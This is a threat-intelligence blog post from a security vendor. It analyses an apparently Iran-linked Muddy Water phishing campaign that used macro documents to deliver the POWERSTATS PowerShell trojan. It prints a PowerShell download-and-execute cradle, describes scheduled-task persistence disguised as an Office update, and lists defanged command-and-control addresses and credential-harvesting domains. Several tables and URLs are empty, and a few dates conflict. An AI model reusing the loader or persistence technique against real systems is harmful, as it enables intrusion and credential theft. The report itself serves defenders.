Summer Mirage

7 January 2020


The Tailored Intelligence Team at Prevailion has uncovered new aspects of sophisticated campaigns that we associate with high confidence to the Muddy Water threat actors. Security researchers, such as FireEye, have stated Muddy Water’ activity was tied to a group with an Iran-nexus. We have dubbed this campaign “Summer Mirage,” and we assess that it is a continuation of activity previously reported campaign called “BlackWater”.

Prevailion uncovered two new malicious documents; one which discussed Stephen Moore’s appointment to the Federal Reserve, the second document discussed companies that extract and process crude oil. Both of these documents relied upon socially engineering their victims into enabling macros in order to infect the targeted workstation. Once macros were enabled, the threat actor-written code would attempt to obtain a trojan hosted on an adversarial payload command and control node. This was a fully functional remote access trojan, that would allow the threat actors to interact with the compromised workstation via the adversarial interactive command and control node.

This activity shows an increased level of sophistication from related samples observed months prior. The threat actor added a persistence feature at the document level, in order to try and establish persistence on the workstation. One notable feature was that the macro was named “H-3 Airstrike,” which was likely a reference to a surprise air attack by the Iranian Air Force during the Iran–Iraq War, in which they destroyed Iraqi aircraft to include a new shipment of Mirage F1 planes. The threat actors also added some new features to the PowerShell based trojan called POWERSTATS, such as a secondary command and control server.

Through analysis of the interactive command and control node, Prevailion observed one domain that briefly resolved to a particular IP address. 91[.]132[.]139[.]196, before moving to a new command and control node that was used to harvest credentials. This brief overlap in IP addresses represents an operational mistake by the threat actor, allowing us to identify this credential-harvesting command and control node which hosted numerous typo-squatted domains that appeared to mimic login services. We assess with moderate confidence that these domains were used to harvest credentials from targeted accounts.

While we acknowledge that these campaigns likely occurred during the summer of 2019; given the historical targeting trends combined with the subject matter of the two documents, we thought it prudent to report these findings. We suspect that previously compromised networks would be particularly vulnerable to attacks, as attempts to infiltrate new targets are likely going to be extremely difficult at a time of heightened awareness. This report documents the increased and unreported activity in the sector, and documenting their relevant TTPs to better inform security practitioners. We encourage at-risk organizations to update and properly configure end-point antivirus and email filters, as well as training employees not to enable macros on documents coming from untrusted sources.

Technical Details

Muddy Water draws inspiration from Washington

The Tailored Intelligence Team at Prevailion has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor Muddy Water, and these indicators are likely a continuation of the BlackWater campaign that was previously reported by Cisco Talos. Muddy Water has been active since at least November 2017 and these indicators revealed some of their latest tactics, techniques and procedures (TTPs). We suspect that these documents were sent to victims via phishing emails.

One previously unreported document, that had a creation date of April 23th, 2019 according to metadata, discussed “Stephen Moore, the economic advisor to the president Trump [of the United States] plans to nominate [Moore] to the federal reserve.” This date coincides with a New York Times article published April 23, 2019 that generated a flurry of headlines around Moore’s nomination and was the source of the text pasted into Muddy Water’s document.

Upon further analysis of this document, it contained a malicious macro named “BlackWater”. The macro was the same one previously reported and even referenced the same command and control node, hxxp://38[.]132[.]99[.]167/crf.txt.

New Document targeting the Petroleum Vertical

In late June 2018, specifically the 25th based off document metadata, another document turned up that we associated with high confidence to this campaign named “letter.doc.” The verbiage appeared to target members of the oil and gas vertical.

Image of the trojanized document prior to enabling macros

Image of the trojanized document after macros were enabled

The document contained a macro named “H3OpAirStrike”. This could be a reference to the “H-3 airstrike” which was a surprise air attack by the Iranian Air Force during the Iran–Iraq War on 4 April 1981 against the airbases of the Iraqi Air Force at the H-3 Air Base in western Iraq. The Iranians claimed that they destroyed 48 Iraqi aircraft on the ground with no losses of their own. (link) One of the other variables was named “Mirage F1” which was the type of aircraft the Iraqi Air Force was using at the time of the H-3 airstrike. (link)

Deobfsucated version of the H3AirStrike.bas macro

This second macro contains some new features that were not previously associated with this group. According to Microsoft documents, the H3AirStrike2.bas macro created a task that is scheduled to execute at a start boundary. This start boundary would be defined by the threat actors. The code ensured that the task would run, remain hidden, and run even if the machine is operating on battery power. This adversarial created task would be named “MSOfficeUpdate”.

Deobfsucated version of the H3AirStrike2.bas macro

Once the document’s macro was run it communicated with the adversarial command and control server located at hxxp://104[.]237[.]255[.]195/p.txt, in order to obtain the PowerShell payload.

$ErrorActionPreference=’SilentlyContinue’;function gtcr(){ try { $wecieoject = New-Object System.Net.WebClient; $wecieoject.Proxy = [System.Net.WebProxy]::GetDefaultProxy(); $wecieoject.UseDefaultCredentials=$true; $wecieoject.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;

$coreoet = $wecieoject.DownloadString(“”); } catch { “WoW”;sleep -s 60; gtcr;} iex($coreoet)} gtcr

PowerShell code run that would obtain the fully functional PowerShell Trojan

The PowerShell trojan was hosted on an adversarial controlled command and control node. The threat actors also took additional steps to obfuscate the payload using an open-source framework called Invoke-obfuscation. This would likely complicate analysis of the sample,and decrease its discovery rate by endpoint detection.

Image of p.txt as it would appear when downloaded 

Image of p.txt once deobfuscated

Once the payload was deobfuscated, it was revealed to be the same PowerShell trojan, called POWERSTATS, that the group used in the early part of last year. In fact some of the variable names used such as HS, OA, OFN, UN, and PIA are even the same. Similar to the previous BlackWater campaign, the trojan would perform some host based enumeration and then append that data to a URL post request to the interactive command and control node. The host based information obtained was the:

  • workstation’s name
  • workstation’s Operating System Architecture
  • workstation’s caption
  • workstation’s domain
  • workstaion’s username
  • workstation’s public IP address
  • workstation’s MD5 hash of the cryptographic service.

This could serve as a unique identifier in case a user has multiple workstations. There were also similarities in the structure of the URL request. The URL contained the same string “?rCecms=[macro name] format. For example:


There were a few new features added to this PowerShell script from the previously reported version. The new trojan obtained the public IP address from They also embedded a second command and control IP address, 194[.]187[.]249[.]78, further down in the script, files downloaded from this IP address would be placed in the Downloads folder.

Screenshot of the EXCcNANscr function, with the secondary C2

Once the files were downloaded the author added an easter egg comment to remind the operator to “!!Please Check if File is Available, Who Knows What the AV Will do!!”

Deobfuscated function DnLDFILE

Credential Harvesting Campaign 

Searching on passive DNS (pDNS) history associated with the interactive command and control  node at IP address 91[.]132[.]139[.]196, there was one domain, account-signin-secure[.]com, that resolved to this IP address for one day on April 17th, 2019. The following day, March 18th, that domain then moved to the IP address 91[.]132[.]139[.]194. Searching on pDNS records associated with the IP address 91[.]132[.]139[.]194 revealed the following typo-squatted domains.

Cluster 1 – Typo Squatted Domains 
Date  Domain IP Address 

Two URLs associated with aforementioned domains were; -hxxps://


Based upon these URLs, we suspect that these domains were likely used in operations to harvest end-user credentials. Through analyzing domains associated with the IP address 91.132.139[.]194, we were able to discover one hostname,, and one domain,, that overlapped with the IP address This lead us to discover “Cluster 2” of typo-squatted domains. We associate cluster 2 to this same threat actor.

Cluster 2 – Typo Squatted Domains 
Date  Domain  IP address 

Indicators of Compromise

Sha256 Hashes


















The Latest

Prevailion CEO, Karim Hijazi – Cheddar News- FCC commissioner calls on Apple and Google to ban TikTok app

A member of the FCC renewed urgency calls on Apple and Google to remove TikTok from their app stores, raising concerns that TikTok’s Chinese-based parent company is collecting user data that is being accessed in China.

IRONSCALES Cyber Security Heroes: The New Cyber Era Post Ukraine Invasion

What Wicked Webs We Un-weave

What Wicked Webs We Un-weave: Wizard Spider once again proving it isn’t you, it isn’t me; we search for things that you can’t see Authored by: Matt Stafford and Sherman Smith Executive summary: In late January 2022, Prevailion’s Adversarial Counterintelligence Team (PACT) identified extensive phishing activity designed to harvest credentials for Naver. Naver is a […]

Copyright 2023 Prevailion, Inc. All rights reserved.    

Disclaimer: Gartner “Cool Vendors in Security Operations and Threat Intelligence,” Mitchell Schneider, Ruggero Contu, John Watts, Craig Lawson, October 13, 2020. GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved. Gartner Disclaimer: The GARTNER COOL VENDOR badge is a trademark and service mark of Gartner, Inc. and/or its affiliates and is used herein with permission. All rights reserved. Gartner does not endorse any vendor, product or service depicted in its research publications and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s Research & Advisory organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.